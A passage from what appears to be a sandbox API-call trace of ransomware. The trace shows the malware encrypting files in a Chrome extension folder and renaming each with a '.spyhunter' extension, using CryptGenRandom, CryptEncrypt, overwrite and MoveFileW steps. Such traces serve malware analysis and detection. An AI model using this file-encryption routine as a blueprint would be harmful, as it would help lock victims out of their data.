Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.spyhunter") returned 176 [0158.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.spyhunter")) returned 1 [0158.016] GetProcessHeap () returned 0x2c0000 [0158.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.016] GetProcessHeap () returned 0x2c0000 [0158.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0158.016] GetProcessHeap () returned 0x2c0000 [0158.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dfe0 | out: hHeap=0x2c0000) returned 1 [0158.016] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb08 | out: pbBuffer=0x57eb08) returned 1 [0158.016] GetProcessHeap () returned 0x2c0000 [0158.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0158.016] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb00*=0x30) returned 1 [0158.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.017] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0158.017] StrStrW (lpFirst="feedback_script.js", lpSrch=".txt") returned 0x0 [0158.017] GetProcessHeap () returned 0x2c0000 [0158.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.017] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eac4*=0x2800, lpOverlapped=0x0) returned 1 [0158.022] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.022] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eac4*=0x2800, lpOverlapped=0x0) returned 1 [0158.022] GetProcessHeap () returned 0x2c0000 [0158.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.023] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.023] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x57eb04*, lpNumberOfBytesWritten=0x57eac4*=0x4, lpOverlapped=0x0) returned 1 [0158.023] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eac4*=0x30, lpOverlapped=0x0) returned 1 [0158.023] CloseHandle (hObject=0x9c) returned 1 [0158.023] GetProcessHeap () returned 0x2c0000 [0158.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.023] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.spyhunter") returned 167 [0158.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.spyhunter")) returned 1 [0158.024] GetProcessHeap () returned 0x2c0000 [0158.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.024] GetProcessHeap () returned 0x2c0000 [0158.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0158.024] GetProcessHeap () returned 0x2c0000 [0158.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80808 | out: hHeap=0x2c0000) returned 1 [0158.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb08 | out: pbBuffer=0x57eb08) returned 1 [0158.024] GetProcessHeap () returned 0x2c0000 [0158.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0158.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb00*=0x30) returned 1 [0158.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0158.025] StrStrW (lpFirst="feedback.css", lpSrch=".txt") returned 0x0 [0158.025] GetProcessHeap () returned 0x2c0000 [0158.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.025] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eac4*=0xc26, lpOverlapped=0x0) returned 1 [0158.027] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff3da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.027] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc26, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eac4*=0xc26, lpOverlapped=0x0) returned 1 [0158.027] GetProcessHeap () returned 0x2c0000 [0158.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.027] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.027] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x57eb04*, lpNumberOfBytesWritten=0x57eac4*=0x4, lpOverlapped=0x0) returned 1 [0158.027] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eac4*=0x30, lpOverlapped=0x0) returned 1 [0158.027] CloseHandle (hObject=0x9c) returned 1 [0158.027] GetProcessHeap () returned 0x2c0000 [0158.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.027] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.spyhunter") returned 161 [0158.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.spyhunter")) returned 1 [0158.028] GetProcessHeap () returned 0x2c0000 [0158.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.028] GetProcessHeap () returned 0x2c0000 [0158.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0158.028] GetProcessHeap () returned 0x2c0000 [0158.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31de68 | out: hHeap=0x2c0000) returned 1 [0158.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb00 | out: pbBuffer=0x57eb00) returned 1 [0158.029] GetProcessHeap () returned 0x2c0000 [0158.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0158.029] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaf8*=0x30) returned 1 [0158.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0158.029] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0158.029] StrStrW (lpFirst="common.js", lpSrch=".txt") returned 0x0 [0158.031] GetProcessHeap () returned 0x2c0000 [0158.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.031] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eabc*=0x2800, lpOverlapped=0x0) returned 1 [0158.816] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.816] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eabc*=0x2800, lpOverlapped=0x0) returned 1 [0158.816] GetProcessHeap () returned 0x2c0000 [0158.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.816] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.816] WriteFile (in: hFile=0x9c, lpBuffer=0x57eafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x57eafc*, lpNumberOfBytesWritten=0x57eabc*=0x4, lpOverlapped=0x0) returned 1 [0158.859] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eabc*=0x30, lpOverlapped=0x0) returned 1 [0158.859] CloseHandle (hObject=0x9c) returned 1 [0158.859] GetProcessHeap () returned 0x2c0000 [0158.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.859] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.spyhunter") returned 158 [0158.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.spyhunter")) returned 1 [0158.860] GetProcessHeap () returned 0x2c0000 [0158.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.860] GetProcessHeap () returned 0x2c0000 [0158.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0158.860] GetProcessHeap () returned 0x2c0000 [0158.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7340 | out: hHeap=0x2c0000) returned 1 [0158.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb00 | out: pbBuffer=0x57eb00) returned 1 [0158.861] GetProcessHeap () returned 0x2c0000 [0158.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0158.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaf8*=0x30) returned 1 [0158.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html") returned 162 [0158.892] StrStrW (lpFirst="devices.html", lpSrch=".txt") returned 0x0 [0158.892] GetProcessHeap () returned 0x2c0000 [0158.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.893] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eabc*=0x3b, lpOverlapped=0x0) returned 1 [0158.893] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.893] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eabc*=0x3b, lpOverlapped=0x0) returned 1 [0158.894] GetProcessHeap () returned 0x2c0000 [0158.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.894] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.894] WriteFile (in: hFile=0xa0, lpBuffer=0x57eafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x57eafc*, lpNumberOfBytesWritten=0x57eabc*=0x4, lpOverlapped=0x0) returned 1 [0158.894] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eabc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eabc*=0x30, lpOverlapped=0x0) returned 1 [0158.894] CloseHandle (hObject=0xa0) returned 1 [0158.894] GetProcessHeap () returned 0x2c0000 [0158.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.894] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.spyhunter") returned 172 [0158.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.spyhunter")) returned 1 [0158.895] GetProcessHeap () returned 0x2c0000 [0158.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.895] GetProcessHeap () returned 0x2c0000 [0158.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0158.895] GetProcessHeap () returned 0x2c0000 [0158.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20b20 | out: hHeap=0x2c0000) returned 1 [0158.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eaf8 | out: pbBuffer=0x57eaf8) returned 1 [0158.896] GetProcessHeap () returned 0x2c0000 [0158.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0158.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaf0*=0x30) returned 1 [0158.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js") returned 153 [0158.897] StrStrW (lpFirst="cast_sender.js", lpSrch=".txt") returned 0x0 [0158.897] GetProcessHeap () returned 0x2c0000 [0158.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.897] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eab4*=0x2800, lpOverlapped=0x0) returned 1 [0158.942] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.942] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eab4*=0x2800, lpOverlapped=0x0) returned 1 [0158.942] GetProcessHeap () returned 0x2c0000 [0158.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.942] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.942] WriteFile (in: hFile=0xa0, lpBuffer=0x57eaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x57eaf4*, lpNumberOfBytesWritten=0x57eab4*=0x4, lpOverlapped=0x0) returned 1 [0159.009] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eab4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eab4*=0x30, lpOverlapped=0x0) returned 1 [0159.009] CloseHandle (hObject=0xa0) returned 1 [0159.009] GetProcessHeap () returned 0x2c0000 [0159.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.009] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.spyhunter") returned 163 [0159.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.spyhunter")) returned 1 [0159.010] GetProcessHeap () returned 0x2c0000 [0159.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.010] GetProcessHeap () returned 0x2c0000 [0159.010] HeapFree (in: 